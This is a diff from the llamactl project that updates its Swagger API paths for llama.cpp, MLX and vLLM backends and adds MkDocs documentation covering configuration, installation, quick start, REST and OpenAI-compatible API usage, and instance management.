schema:
type: string
security:
- ApiKeyAuth: []
summary: List available devices for llama server
tags:
- backends
/backends/llama-cpp/help:
get:
description: Returns the help text for the llama server command
responses:
"200":
description: Help text
schema:
type: string
"500":
description: Internal Server Error
schema:
type: string
security:
- ApiKeyAuth: []
summary: Get help for llama server
tags:
- backends
/backends/llama-cpp/parse-command:
post:
consumes:
- application/json
description: Parses a llama-server command string into instance options
parameters:
- description: Command to parse
in: body
name: request
required: true
schema:
$ref: '#/definitions/server.ParseCommandRequest'
produces:
- application/json
responses:
"200":
description: Parsed options
schema:
$ref: '#/definitions/instance.CreateInstanceOptions'
"400":
description: Invalid request or command
schema:
additionalProperties:
type: string
type: object
"500":
description: Internal Server Error
schema:
additionalProperties:
type: string
type: object
security:
- ApiKeyAuth: []
summary: Parse llama-server command
tags:
- backends
/backends/llama-cpp/version:
get:
description: Returns the version of the llama server command
responses:
"200":
description: Version information
schema:
type: string
"500":
description: Internal Server Error
schema:
type: string
security:
- ApiKeyAuth: []
summary: Get version of llama server
tags:
- backends
/backends/mlx/parse-command:
post:
consumes:
- application/json
description: Parses MLX-LM server command string into instance options
parameters:
- description: Command to parse
in: body
name: request
required: true
schema:
$ref: '#/definitions/server.ParseCommandRequest'
produces:
- application/json
responses:
"200":
description: Parsed options
schema:
$ref: '#/definitions/instance.CreateInstanceOptions'
"400":
description: Invalid request or command
schema:
additionalProperties:
type: string
type: object
security:
- ApiKeyAuth: []
summary: Parse mlx_lm.server command
tags:
- backends
/backends/vllm/parse-command:
post:
consumes:
- application/json
description: Parses a vLLM serve command string into instance options
parameters:
- description: Command to parse
in: body
name: request
required: true
schema:
$ref: '#/definitions/server.ParseCommandRequest'
produces:
- application/json
responses:
"200":
description: Parsed options
schema:
$ref: '#/definitions/instance.CreateInstanceOptions'
"400":
description: Invalid request or command
schema:
additionalProperties:
type: string
type: object
security:
- ApiKeyAuth: []
summary: Parse vllm serve command
tags:
- backends
/instances:
get:
description: Returns a list of all instances managed by the server
@@ -694,57 +545,6 @@ paths:
summary: Stop a running instance
tags:
- instances
/server/devices:
get:
description: Returns a list of available devices for the llama server
responses:
"200":
description: List of devices
schema:
type: string
"500":
description: Internal Server Error
schema:
type: string
security:
- ApiKeyAuth: []
summary: List available devices for llama server
tags:
- server
/server/help:
get:
description: Returns the help text for the llama server command
responses:
"200":
description: Help text
schema:
type: string
"500":
description: Internal Server Error
schema:
type: string
security:
- ApiKeyAuth: []
summary: Get help for llama server
tags:
- server
/server/version:
get:
description: Returns the version of the llama server command
responses:
"200":
description: Version information
schema:
type: string
"500":
description: Internal Server Error
schema:
type: string
security:
- ApiKeyAuth: []
summary: Get version of llama server
tags:
- server
/v1/:
post:
consumes:
@@ -756,7 +556,7 @@ paths:
"200":
description: OpenAI response
"400":
description: Invalid request body or model name
description: Invalid request body or instance name
schema:
type: string
"500":

View File

@@ -58,7 +58,7 @@ func main() {
}
// Initialize the instance manager
instanceManager := manager.NewInstanceManager(cfg.Instances)
instanceManager := manager.NewInstanceManager(cfg.Backends, cfg.Instances)
// Create a new handler with the instance manager
handler := server.NewHandler(instanceManager, cfg)

5
docs-requirements.txt Normal file
View File

@@ -0,0 +1,5 @@
mkdocs-material==9.5.3
mkdocs==1.5.3
pymdown-extensions==10.7
mkdocs-git-revision-date-localized-plugin==1.2.4
mike==2.0.0

View File

@@ -0,0 +1,238 @@
# Configuration
llamactl can be configured via configuration files or environment variables. Configuration is loaded in the following order of precedence:
```
Defaults < Configuration file < Environment variables
```
llamactl works out of the box with sensible defaults, but you can customize the behavior to suit your needs.
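Because of this precedence, an environment variable always overrides the same setting from a configuration file. A minimal sketch (port values are illustrative):
```bash
# llamactl.yaml sets "port: 8080", but the environment variable wins
LLAMACTL_PORT=9090 llamactl
```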
## Default Configuration
Here's the default configuration with all available options:
```yaml
server:
host: "0.0.0.0" # Server host to bind to
port: 8080 # Server port to bind to
allowed_origins: ["*"] # Allowed CORS origins (default: all)
enable_swagger: false # Enable Swagger UI for API docs
backends:
llama-cpp:
command: "llama-server"
args: []
environment: {} # Environment variables for the backend process
docker:
enabled: false
image: "ghcr.io/ggml-org/llama.cpp:server"
args: ["run", "--rm", "--network", "host", "--gpus", "all"]
environment: {}
vllm:
command: "vllm"
args: ["serve"]
environment: {} # Environment variables for the backend process
docker:
enabled: false
image: "vllm/vllm-openai:latest"
args: ["run", "--rm", "--network", "host", "--gpus", "all", "--shm-size", "1g"]
environment: {}
mlx:
command: "mlx_lm.server"
args: []
environment: {} # Environment variables for the backend process
instances:
port_range: [8000, 9000] # Port range for instances
data_dir: ~/.local/share/llamactl # Data directory (platform-specific, see below)
configs_dir: ~/.local/share/llamactl/instances # Instance configs directory
logs_dir: ~/.local/share/llamactl/logs # Logs directory
auto_create_dirs: true # Auto-create data/config/logs dirs if missing
max_instances: -1 # Max instances (-1 = unlimited)
max_running_instances: -1 # Max running instances (-1 = unlimited)
enable_lru_eviction: true # Enable LRU eviction for idle instances
default_auto_restart: true # Auto-restart new instances by default
default_max_restarts: 3 # Max restarts for new instances
default_restart_delay: 5 # Restart delay (seconds) for new instances
default_on_demand_start: true # Default on-demand start setting
on_demand_start_timeout: 120 # Default on-demand start timeout in seconds
timeout_check_interval: 5 # Idle instance timeout check in minutes
auth:
require_inference_auth: true # Require auth for inference endpoints
inference_keys: [] # Keys for inference endpoints
require_management_auth: true # Require auth for management endpoints
management_keys: [] # Keys for management endpoints
```
## Configuration Files
### Configuration File Locations
Configuration files are searched in the following locations (in order of precedence):
**Linux:**
- `./llamactl.yaml` or `./config.yaml` (current directory)
- `$HOME/.config/llamactl/config.yaml`
- `/etc/llamactl/config.yaml`
**macOS:**
- `./llamactl.yaml` or `./config.yaml` (current directory)
- `$HOME/Library/Application Support/llamactl/config.yaml`
- `/Library/Application Support/llamactl/config.yaml`
**Windows:**
- `./llamactl.yaml` or `./config.yaml` (current directory)
- `%APPDATA%\llamactl\config.yaml`
- `%USERPROFILE%\llamactl\config.yaml`
- `%PROGRAMDATA%\llamactl\config.yaml`
You can specify the path to config file with `LLAMACTL_CONFIG_PATH` environment variable.
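For example, to point llamactl at a custom config file (the path below is hypothetical):
```bash
LLAMACTL_CONFIG_PATH=/opt/llamactl/config.yaml llamactl
```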
## Configuration Options
### Server Configuration
```yaml
server:
host: "0.0.0.0" # Server host to bind to (default: "0.0.0.0")
port: 8080 # Server port to bind to (default: 8080)
allowed_origins: ["*"] # CORS allowed origins (default: ["*"])
enable_swagger: false # Enable Swagger UI (default: false)
```
**Environment Variables:**
- `LLAMACTL_HOST` - Server host
- `LLAMACTL_PORT` - Server port
- `LLAMACTL_ALLOWED_ORIGINS` - Comma-separated CORS origins
- `LLAMACTL_ENABLE_SWAGGER` - Enable Swagger UI (true/false)
### Backend Configuration
```yaml
backends:
llama-cpp:
command: "llama-server"
args: []
environment: {} # Environment variables for the backend process
docker:
enabled: false # Enable Docker runtime (default: false)
image: "ghcr.io/ggml-org/llama.cpp:server"
args: ["run", "--rm", "--network", "host", "--gpus", "all"]
environment: {}
vllm:
command: "vllm"
args: ["serve"]
environment: {} # Environment variables for the backend process
docker:
enabled: false
image: "vllm/vllm-openai:latest"
args: ["run", "--rm", "--network", "host", "--gpus", "all", "--shm-size", "1g"]
environment: {}
mlx:
command: "mlx_lm.server"
args: []
environment: {} # Environment variables for the backend process
# MLX does not support Docker
```
**Backend Configuration Fields:**
- `command`: Executable name/path for the backend
- `args`: Default arguments prepended to all instances
- `environment`: Environment variables for the backend process (optional)
- `docker`: Docker-specific configuration (optional)
- `enabled`: Boolean flag to enable Docker runtime
- `image`: Docker image to use
- `args`: Additional arguments passed to `docker run`
- `environment`: Environment variables for the container (optional)
**Environment Variables:**
**LlamaCpp Backend:**
- `LLAMACTL_LLAMACPP_COMMAND` - LlamaCpp executable command
- `LLAMACTL_LLAMACPP_ARGS` - Space-separated default arguments
- `LLAMACTL_LLAMACPP_ENV` - Environment variables in format "KEY1=value1,KEY2=value2"
- `LLAMACTL_LLAMACPP_DOCKER_ENABLED` - Enable Docker runtime (true/false)
- `LLAMACTL_LLAMACPP_DOCKER_IMAGE` - Docker image to use
- `LLAMACTL_LLAMACPP_DOCKER_ARGS` - Space-separated Docker arguments
- `LLAMACTL_LLAMACPP_DOCKER_ENV` - Docker environment variables in format "KEY1=value1,KEY2=value2"
**VLLM Backend:**
- `LLAMACTL_VLLM_COMMAND` - VLLM executable command
- `LLAMACTL_VLLM_ARGS` - Space-separated default arguments
- `LLAMACTL_VLLM_ENV` - Environment variables in format "KEY1=value1,KEY2=value2"
- `LLAMACTL_VLLM_DOCKER_ENABLED` - Enable Docker runtime (true/false)
- `LLAMACTL_VLLM_DOCKER_IMAGE` - Docker image to use
- `LLAMACTL_VLLM_DOCKER_ARGS` - Space-separated Docker arguments
- `LLAMACTL_VLLM_DOCKER_ENV` - Docker environment variables in format "KEY1=value1,KEY2=value2"
**MLX Backend:**
- `LLAMACTL_MLX_COMMAND` - MLX executable command
- `LLAMACTL_MLX_ARGS` - Space-separated default arguments
- `LLAMACTL_MLX_ENV` - Environment variables in format "KEY1=value1,KEY2=value2"
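As a sketch of the comma-separated `KEY=value` format described in the list above (the variable values are illustrative):
```bash
export LLAMACTL_LLAMACPP_ENV="CUDA_VISIBLE_DEVICES=0,OMP_NUM_THREADS=8"
export LLAMACTL_LLAMACPP_DOCKER_ENABLED=true
llamactl
```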
### Instance Configuration
```yaml
instances:
port_range: [8000, 9000] # Port range for instances (default: [8000, 9000])
data_dir: "~/.local/share/llamactl" # Directory for all llamactl data (default varies by OS)
configs_dir: "~/.local/share/llamactl/instances" # Directory for instance configs (default: data_dir/instances)
logs_dir: "~/.local/share/llamactl/logs" # Directory for instance logs (default: data_dir/logs)
auto_create_dirs: true # Automatically create data/config/logs directories (default: true)
max_instances: -1 # Maximum instances (-1 = unlimited)
max_running_instances: -1 # Maximum running instances (-1 = unlimited)
enable_lru_eviction: true # Enable LRU eviction for idle instances
default_auto_restart: true # Default auto-restart setting
default_max_restarts: 3 # Default maximum restart attempts
default_restart_delay: 5 # Default restart delay in seconds
default_on_demand_start: true # Default on-demand start setting
on_demand_start_timeout: 120 # Default on-demand start timeout in seconds
timeout_check_interval: 5 # Default instance timeout check interval in minutes
```
**Environment Variables:**
- `LLAMACTL_INSTANCE_PORT_RANGE` - Port range (format: "8000-9000" or "8000,9000")
- `LLAMACTL_DATA_DIRECTORY` - Data directory path
- `LLAMACTL_INSTANCES_DIR` - Instance configs directory path
- `LLAMACTL_LOGS_DIR` - Log directory path
- `LLAMACTL_AUTO_CREATE_DATA_DIR` - Auto-create data/config/logs directories (true/false)
- `LLAMACTL_MAX_INSTANCES` - Maximum number of instances
- `LLAMACTL_MAX_RUNNING_INSTANCES` - Maximum number of running instances
- `LLAMACTL_ENABLE_LRU_EVICTION` - Enable LRU eviction for idle instances
- `LLAMACTL_DEFAULT_AUTO_RESTART` - Default auto-restart setting (true/false)
- `LLAMACTL_DEFAULT_MAX_RESTARTS` - Default maximum restarts
- `LLAMACTL_DEFAULT_RESTART_DELAY` - Default restart delay in seconds
- `LLAMACTL_DEFAULT_ON_DEMAND_START` - Default on-demand start setting (true/false)
- `LLAMACTL_ON_DEMAND_START_TIMEOUT` - Default on-demand start timeout in seconds
- `LLAMACTL_TIMEOUT_CHECK_INTERVAL` - Default instance timeout check interval in minutes
### Authentication Configuration
```yaml
auth:
require_inference_auth: true # Require API key for OpenAI endpoints (default: true)
inference_keys: [] # List of valid inference API keys
require_management_auth: true # Require API key for management endpoints (default: true)
management_keys: [] # List of valid management API keys
```
**Environment Variables:**
- `LLAMACTL_REQUIRE_INFERENCE_AUTH` - Require auth for OpenAI endpoints (true/false)
- `LLAMACTL_INFERENCE_KEYS` - Comma-separated inference API keys
- `LLAMACTL_REQUIRE_MANAGEMENT_AUTH` - Require auth for management endpoints (true/false)
- `LLAMACTL_MANAGEMENT_KEYS` - Comma-separated management API keys
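A brief sketch of supplying keys via environment variables (the key values are placeholders):
```bash
export LLAMACTL_MANAGEMENT_KEYS="mgmt-key-1,mgmt-key-2"
export LLAMACTL_INFERENCE_KEYS="inference-key-1"
llamactl
```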
## Command Line Options
View all available command line options:
```bash
llamactl --help
```
You can also override configuration using command line flags when starting llamactl.

View File

@@ -0,0 +1,105 @@
# Installation
This guide will walk you through installing Llamactl on your system.
## Prerequisites
### Backend Dependencies
llamactl supports multiple backends. Install at least one:
**For llama.cpp backend (all platforms):**
You need `llama-server` from [llama.cpp](https://github.com/ggml-org/llama.cpp) installed:
```bash
# Homebrew (macOS/Linux)
brew install llama.cpp
# Winget (Windows)
winget install llama.cpp
```
Or build from source - see llama.cpp docs
**For MLX backend (macOS only):**
MLX provides optimized inference on Apple Silicon. Install MLX-LM:
```bash
# Install via pip (requires Python 3.8+)
pip install mlx-lm
# Or in a virtual environment (recommended)
python -m venv mlx-env
source mlx-env/bin/activate
pip install mlx-lm
```
Note: MLX backend is only available on macOS with Apple Silicon (M1, M2, M3, etc.)
**For vLLM backend:**
vLLM provides high-throughput distributed serving for LLMs. Install vLLM:
```bash
# Install via pip (requires Python 3.8+, GPU required)
pip install vllm
# Or in a virtual environment (recommended)
python -m venv vllm-env
source vllm-env/bin/activate
pip install vllm
# For production deployments, consider container-based installation
```
## Installation Methods
### Option 1: Download Binary (Recommended)
Download the latest release from the [GitHub releases page](https://github.com/lordmathis/llamactl/releases):
```bash
# Linux/macOS - Get latest version and download
LATEST_VERSION=$(curl -s https://api.github.com/repos/lordmathis/llamactl/releases/latest | grep '"tag_name":' | sed -E 's/.*"([^"]+)".*/\1/')
curl -L https://github.com/lordmathis/llamactl/releases/download/${LATEST_VERSION}/llamactl-${LATEST_VERSION}-$(uname -s | tr '[:upper:]' '[:lower:]')-$(uname -m).tar.gz | tar -xz
sudo mv llamactl /usr/local/bin/
# Or download manually from:
# https://github.com/lordmathis/llamactl/releases/latest
# Windows - Download from releases page
```
### Option 2: Build from Source
Requirements:
- Go 1.24 or later
- Node.js 22 or later
- Git
If you prefer to build from source:
```bash
# Clone the repository
git clone https://github.com/lordmathis/llamactl.git
cd llamactl
# Build the web UI
cd webui && npm ci && npm run build && cd ..
# Build the application
go build -o llamactl ./cmd/server
```
## Verification
Verify your installation by checking the version:
```bash
llamactl --version
```
## Next Steps
Now that Llamactl is installed, continue to the [Quick Start](quick-start.md) guide to get your first instance running!

View File

@@ -0,0 +1,190 @@
# Quick Start
This guide will help you get Llamactl up and running in just a few minutes.
## Step 1: Start Llamactl
Start the Llamactl server:
```bash
llamactl
```
By default, Llamactl will start on `http://localhost:8080`.
## Step 2: Access the Web UI
Open your web browser and navigate to:
```
http://localhost:8080
```
Log in with the management API key. By default, it is generated during server startup; copy it from the terminal output.
You should see the Llamactl web interface.
## Step 3: Create Your First Instance
1. Click the "Add Instance" button
2. Fill in the instance configuration:
- **Name**: Give your instance a descriptive name
- **Backend Type**: Choose from llama.cpp, MLX, or vLLM
- **Model**: Model path or identifier for your chosen backend
- **Additional Options**: Backend-specific parameters
3. Click "Create Instance"
## Step 4: Start Your Instance
Once created, you can:
- **Start** the instance by clicking the start button
- **Monitor** its status in real-time
- **View logs** by clicking the logs button
- **Stop** the instance when needed
## Example Configurations
Here are basic example configurations for each backend:
**llama.cpp backend:**
```json
{
"name": "llama2-7b",
"backend_type": "llama_cpp",
"backend_options": {
"model": "/path/to/llama-2-7b-chat.gguf",
"threads": 4,
"ctx_size": 2048,
"gpu_layers": 32
}
}
```
**MLX backend (macOS only):**
```json
{
"name": "mistral-mlx",
"backend_type": "mlx_lm",
"backend_options": {
"model": "mlx-community/Mistral-7B-Instruct-v0.3-4bit",
"temp": 0.7,
"max_tokens": 2048
}
}
```
**vLLM backend:**
```json
{
"name": "dialogpt-vllm",
"backend_type": "vllm",
"backend_options": {
"model": "microsoft/DialoGPT-medium",
"tensor_parallel_size": 2,
"gpu_memory_utilization": 0.9
}
}
```
## Docker Support
Llamactl can run backends in Docker containers. To enable Docker for a backend, add a `docker` section to that backend in your YAML configuration file (e.g. `config.yaml`) as shown below:
```yaml
backends:
vllm:
command: "vllm"
args: ["serve"]
docker:
enabled: true
image: "vllm/vllm-openai:latest"
args: ["run", "--rm", "--network", "host", "--gpus", "all", "--shm-size", "1g"]
```
## Using the API
You can also manage instances via the REST API:
```bash
# List all instances
curl http://localhost:8080/api/instances
# Create a new llama.cpp instance
curl -X POST http://localhost:8080/api/instances/my-model \
-H "Content-Type: application/json" \
-d '{
"backend_type": "llama_cpp",
"backend_options": {
"model": "/path/to/model.gguf"
}
}'
# Start an instance
curl -X POST http://localhost:8080/api/instances/my-model/start
```
## OpenAI Compatible API
Llamactl provides OpenAI-compatible endpoints, making it easy to integrate with existing OpenAI client libraries and tools.
### Chat Completions
Once you have an instance running, you can use it with the OpenAI-compatible chat completions endpoint:
```bash
curl -X POST http://localhost:8080/v1/chat/completions \
-H "Content-Type: application/json" \
-d '{
"model": "my-model",
"messages": [
{
"role": "user",
"content": "Hello! Can you help me write a Python function?"
}
],
"max_tokens": 150,
"temperature": 0.7
}'
```
### Using with Python OpenAI Client
You can also use the official OpenAI Python client:
```python
from openai import OpenAI
# Point the client to your Llamactl server
client = OpenAI(
base_url="http://localhost:8080/v1",
api_key="not-needed" # Llamactl doesn't require API keys by default
)
# Create a chat completion
response = client.chat.completions.create(
model="my-model", # Use the name of your instance
messages=[
{"role": "user", "content": "Explain quantum computing in simple terms"}
],
max_tokens=200,
temperature=0.7
)
print(response.choices[0].message.content)
```
### List Available Models
Get a list of running instances (models) in OpenAI-compatible format:
```bash
curl http://localhost:8080/v1/models
```
## Next Steps
- Learn how to manage instances in the [Managing Instances](../user-guide/managing-instances.md) guide
- Explore the [API Reference](../user-guide/api-reference.md)
- Configure advanced settings in the [Configuration](configuration.md) guide

Binary image files changed (not shown): one image added (69 KiB), docs/images/dashboard.png added (31 KiB), and one image replaced (previous size 47 KiB).

34
docs/index.md Normal file
View File

@@ -0,0 +1,34 @@
# Llamactl Documentation
Welcome to the Llamactl documentation!
![Dashboard Screenshot](images/dashboard.png)
## What is Llamactl?
**{{HEADLINE}}**
## Features
{{FEATURES}}
## Quick Links
- [Installation Guide](getting-started/installation.md) - Get Llamactl up and running
- [Configuration Guide](getting-started/configuration.md) - Detailed configuration options
- [Quick Start](getting-started/quick-start.md) - Your first steps with Llamactl
- [Managing Instances](user-guide/managing-instances.md) - Instance lifecycle management
- [API Reference](user-guide/api-reference.md) - Complete API documentation
## Getting Help
If you need help or have questions:
- Check the [Troubleshooting](user-guide/troubleshooting.md) guide
- Visit the [GitHub repository](https://github.com/lordmathis/llamactl)
- Review the [Configuration Guide](getting-started/configuration.md) for advanced settings
## License
MIT License - see the [LICENSE](https://github.com/lordmathis/llamactl/blob/main/LICENSE) file.

62
docs/readme_sync.py Normal file
View File

@@ -0,0 +1,62 @@
"""
MkDocs hook to sync content from README.md to docs/index.md
"""
import re
import os
def on_page_markdown(markdown, page, config, **kwargs):
"""Process markdown content before rendering"""
# Only process the index.md file
if page.file.src_path != 'index.md':
return markdown
# Get the path to README.md (relative to mkdocs.yml)
readme_path = os.path.join(os.path.dirname(config['config_file_path']), 'README.md')
if not os.path.exists(readme_path):
print(f"Warning: README.md not found at {readme_path}")
return markdown
try:
with open(readme_path, 'r', encoding='utf-8') as f:
readme_content = f.read()
except Exception as e:
print(f"Error reading README.md: {e}")
return markdown
# Extract headline (the text in bold after the title)
headline_match = re.search(r'\*\*(.*?)\*\*', readme_content)
headline = headline_match.group(1) if headline_match else 'Management server for llama.cpp and MLX instances'
# Extract features section - everything between ## Features and the next ## heading
features_match = re.search(r'## Features\n(.*?)(?=\n## |\Z)', readme_content, re.DOTALL)
if features_match:
features_content = features_match.group(1).strip()
# Just add line breaks at the end of each line for proper MkDocs rendering
features_with_breaks = add_line_breaks(features_content)
else:
features_with_breaks = "Features content not found in README.md"
# Replace placeholders in the markdown
markdown = markdown.replace('{{HEADLINE}}', headline)
markdown = markdown.replace('{{FEATURES}}', features_with_breaks)
# Fix image paths: convert docs/images/ to images/ for MkDocs
markdown = re.sub(r'docs/images/', 'images/', markdown)
return markdown
def add_line_breaks(content):
"""Add two spaces at the end of each line for proper MkDocs line breaks"""
lines = content.split('\n')
processed_lines = []
for line in lines:
if line.strip(): # Only add spaces to non-empty lines
processed_lines.append(line.rstrip() + ' ')
else:
processed_lines.append(line)
return '\n'.join(processed_lines)

View File

@@ -0,0 +1,527 @@
# API Reference
Complete reference for the Llamactl REST API.
## Base URL
All API endpoints are relative to the base URL:
```
http://localhost:8080/api/v1
```
## Authentication
Llamactl supports API key authentication. If authentication is enabled, include the API key in the Authorization header:
```bash
curl -H "Authorization: Bearer <your-api-key>" \
http://localhost:8080/api/v1/instances
```
The server supports two types of API keys:
- **Management API Keys**: Required for instance management operations (CRUD operations on instances)
- **Inference API Keys**: Required for OpenAI-compatible inference endpoints
## System Endpoints
### Get Llamactl Version
Get the version information of the llamactl server.
```http
GET /api/v1/version
```
**Response:**
```
Version: 1.0.0
Commit: abc123
Build Time: 2024-01-15T10:00:00Z
```
### Get Llama Server Help
Get help text for the llama-server command.
```http
GET /api/v1/backends/llama-cpp/help
```
**Response:** Plain text help output from `llama-server --help`
### Get Llama Server Version
Get version information of the llama-server binary.
```http
GET /api/v1/backends/llama-cpp/version
```
**Response:** Plain text version output from `llama-server --version`
### List Available Devices
List available devices for llama-server.
```http
GET /api/v1/backends/llama-cpp/devices
```
**Response:** Plain text device list from `llama-server --list-devices`
## Instances
### List All Instances
Get a list of all instances.
```http
GET /api/v1/instances
```
**Response:**
```json
[
{
"name": "llama2-7b",
"status": "running",
"created": 1705312200
}
]
```
### Get Instance Details
Get detailed information about a specific instance.
```http
GET /api/v1/instances/{name}
```
**Response:**
```json
{
"name": "llama2-7b",
"status": "running",
"created": 1705312200
}
```
### Create Instance
Create and start a new instance.
```http
POST /api/v1/instances/{name}
```
**Request Body:** JSON object with instance configuration. Common fields include:
- `backend_type`: Backend type (`llama_cpp`, `mlx_lm`, or `vllm`)
- `backend_options`: Backend-specific configuration
- `auto_restart`: Enable automatic restart on failure
- `max_restarts`: Maximum restart attempts
- `restart_delay`: Delay between restarts in seconds
- `on_demand_start`: Start instance when receiving requests
- `idle_timeout`: Idle timeout in minutes
- `environment`: Environment variables as key-value pairs
See [Managing Instances](managing-instances.md) for complete configuration options.
**Response:**
```json
{
"name": "llama2-7b",
"status": "running",
"created": 1705312200
}
```
### Update Instance
Update an existing instance configuration. See [Managing Instances](managing-instances.md) for available configuration options.
```http
PUT /api/v1/instances/{name}
```
**Request Body:** JSON object with configuration fields to update.
**Response:**
```json
{
"name": "llama2-7b",
"status": "running",
"created": 1705312200
}
```
### Delete Instance
Stop and remove an instance.
```http
DELETE /api/v1/instances/{name}
```
**Response:** `204 No Content`
## Instance Operations
### Start Instance
Start a stopped instance.
```http
POST /api/v1/instances/{name}/start
```
**Response:**
```json
{
"name": "llama2-7b",
"status": "running",
"created": 1705312200
}
```
**Error Responses:**
- `409 Conflict`: Maximum number of running instances reached
- `500 Internal Server Error`: Failed to start instance
### Stop Instance
Stop a running instance.
```http
POST /api/v1/instances/{name}/stop
```
**Response:**
```json
{
"name": "llama2-7b",
"status": "stopped",
"created": 1705312200
}
```
### Restart Instance
Restart an instance (stop then start).
```http
POST /api/v1/instances/{name}/restart
```
**Response:**
```json
{
"name": "llama2-7b",
"status": "running",
"created": 1705312200
}
```
### Get Instance Logs
Retrieve instance logs.
```http
GET /api/v1/instances/{name}/logs
```
**Query Parameters:**
- `lines`: Number of lines to return (defaults to all lines; pass `-1` to explicitly request all lines)
**Response:** Plain text log output
**Example:**
```bash
curl "http://localhost:8080/api/v1/instances/my-instance/logs?lines=100"
```
### Proxy to Instance
Proxy HTTP requests directly to the llama-server instance.
```http
GET /api/v1/instances/{name}/proxy/*
POST /api/v1/instances/{name}/proxy/*
```
This endpoint forwards all requests to the underlying llama-server instance running on its configured port. The proxy strips the `/api/v1/instances/{name}/proxy` prefix and forwards the remaining path to the instance.
**Example - Check Instance Health:**
```bash
curl -H "Authorization: Bearer your-api-key" \
http://localhost:8080/api/v1/instances/my-model/proxy/health
```
This forwards the request to `http://instance-host:instance-port/health` on the actual llama-server instance.
**Error Responses:**
- `503 Service Unavailable`: Instance is not running
## OpenAI-Compatible API
Llamactl provides OpenAI-compatible endpoints for inference operations.
### List Models
List all instances in OpenAI-compatible format.
```http
GET /v1/models
```
**Response:**
```json
{
"object": "list",
"data": [
{
"id": "llama2-7b",
"object": "model",
"created": 1705312200,
"owned_by": "llamactl"
}
]
}
```
### Chat Completions, Completions, Embeddings
All OpenAI-compatible inference endpoints are available:
```http
POST /v1/chat/completions
POST /v1/completions
POST /v1/embeddings
POST /v1/rerank
POST /v1/reranking
```
**Request Body:** Standard OpenAI format with `model` field specifying the instance name
**Example:**
```json
{
"model": "llama2-7b",
"messages": [
{
"role": "user",
"content": "Hello, how are you?"
}
]
}
```
The server routes requests to the appropriate instance based on the `model` field in the request body. Instances with on-demand starting enabled will be automatically started if not running. For configuration details, see [Managing Instances](managing-instances.md).
**Error Responses:**
- `400 Bad Request`: Invalid request body or missing instance name
- `503 Service Unavailable`: Instance is not running and on-demand start is disabled
- `409 Conflict`: Cannot start instance due to maximum instances limit
## Instance Status Values
Instances can have the following status values:
- `stopped`: Instance is not running
- `running`: Instance is running and ready to accept requests
- `failed`: Instance failed to start or crashed
## Error Responses
All endpoints may return error responses in the following format:
```json
{
"error": "Error message description"
}
```
### Common HTTP Status Codes
- `200`: Success
- `201`: Created
- `204`: No Content (successful deletion)
- `400`: Bad Request (invalid parameters or request body)
- `401`: Unauthorized (missing or invalid API key)
- `403`: Forbidden (insufficient permissions)
- `404`: Not Found (instance not found)
- `409`: Conflict (instance already exists, max instances reached)
- `500`: Internal Server Error
- `503`: Service Unavailable (instance not running)
## Examples
### Complete Instance Lifecycle
```bash
# Create and start instance
curl -X POST http://localhost:8080/api/v1/instances/my-model \
-H "Content-Type: application/json" \
-H "Authorization: Bearer your-api-key" \
-d '{
"backend_type": "llama_cpp",
"backend_options": {
"model": "/models/llama-2-7b.gguf",
"gpu_layers": 32
},
"environment": {
"CUDA_VISIBLE_DEVICES": "0",
"OMP_NUM_THREADS": "8"
}
}'
# Check instance status
curl -H "Authorization: Bearer your-api-key" \
http://localhost:8080/api/v1/instances/my-model
# Get instance logs
curl -H "Authorization: Bearer your-api-key" \
"http://localhost:8080/api/v1/instances/my-model/logs?lines=50"
# Use OpenAI-compatible chat completions
curl -X POST http://localhost:8080/v1/chat/completions \
-H "Content-Type: application/json" \
-H "Authorization: Bearer your-inference-api-key" \
-d '{
"model": "my-model",
"messages": [
{"role": "user", "content": "Hello!"}
],
"max_tokens": 100
}'
# Stop instance
curl -X POST -H "Authorization: Bearer your-api-key" \
http://localhost:8080/api/v1/instances/my-model/stop
# Delete instance
curl -X DELETE -H "Authorization: Bearer your-api-key" \
http://localhost:8080/api/v1/instances/my-model
```
### Using the Proxy Endpoint
You can also directly proxy requests to the llama-server instance:
```bash
# Direct proxy to instance (bypasses OpenAI compatibility layer)
curl -X POST http://localhost:8080/api/v1/instances/my-model/proxy/completion \
-H "Content-Type: application/json" \
-H "Authorization: Bearer your-api-key" \
-d '{
"prompt": "Hello, world!",
"n_predict": 50
}'
```
## Backend-Specific Endpoints
### Parse Commands
Llamactl provides endpoints to parse command strings from different backends into instance configuration options.
#### Parse Llama.cpp Command
Parse a llama-server command string into instance options.
```http
POST /api/v1/backends/llama-cpp/parse-command
```
**Request Body:**
```json
{
"command": "llama-server -m /path/to/model.gguf -c 2048 --port 8080"
}
```
**Response:**
```json
{
"backend_type": "llama_cpp",
"llama_server_options": {
"model": "/path/to/model.gguf",
"ctx_size": 2048,
"port": 8080
}
}
```
#### Parse MLX-LM Command
Parse an MLX-LM server command string into instance options.
```http
POST /api/v1/backends/mlx/parse-command
```
**Request Body:**
```json
{
"command": "mlx_lm.server --model /path/to/model --port 8080"
}
```
**Response:**
```json
{
"backend_type": "mlx_lm",
"mlx_server_options": {
"model": "/path/to/model",
"port": 8080
}
}
```
#### Parse vLLM Command
Parse a vLLM serve command string into instance options.
```http
POST /api/v1/backends/vllm/parse-command
```
**Request Body:**
```json
{
"command": "vllm serve /path/to/model --port 8080"
}
```
**Response:**
```json
{
"backend_type": "vllm",
"vllm_server_options": {
"model": "/path/to/model",
"port": 8080
}
}
```
**Error Responses for Parse Commands:**
- `400 Bad Request`: Invalid request body, empty command, or parse error
- `500 Internal Server Error`: Encoding error
## Auto-Generated Documentation
The API documentation is automatically generated from code annotations using Swagger/OpenAPI. To regenerate the documentation:
1. Install the swag tool: `go install github.com/swaggo/swag/cmd/swag@latest`
2. Generate docs: `swag init -g cmd/server/main.go -o apidocs`
## Swagger Documentation
If swagger documentation is enabled in the server configuration, you can access the interactive API documentation at:
```
http://localhost:8080/swagger/
```
This provides a complete interactive interface for testing all API endpoints.

View File

@@ -0,0 +1,229 @@
# Managing Instances
Learn how to effectively manage your llama.cpp, MLX, and vLLM instances with Llamactl through both the Web UI and API.
## Overview
Llamactl provides two ways to manage instances:
- **Web UI**: Accessible at `http://localhost:8080` with an intuitive dashboard
- **REST API**: Programmatic access for automation and integration
![Dashboard Screenshot](../images/dashboard.png)
### Authentication
If authentication is enabled:
1. Navigate to the web UI
2. Enter your credentials
3. Bearer token is stored for the session
### Theme Support
- Switch between light and dark themes
- Setting is remembered across sessions
## Instance Cards
Each instance is displayed as a card showing:
- **Instance name**
- **Health status badge** (unknown, ready, error, failed)
- **Action buttons** (start, stop, edit, logs, delete)
## Create Instance
### Via Web UI
![Create Instance Screenshot](../images/create_instance.png)
1. Click the **"Create Instance"** button on the dashboard
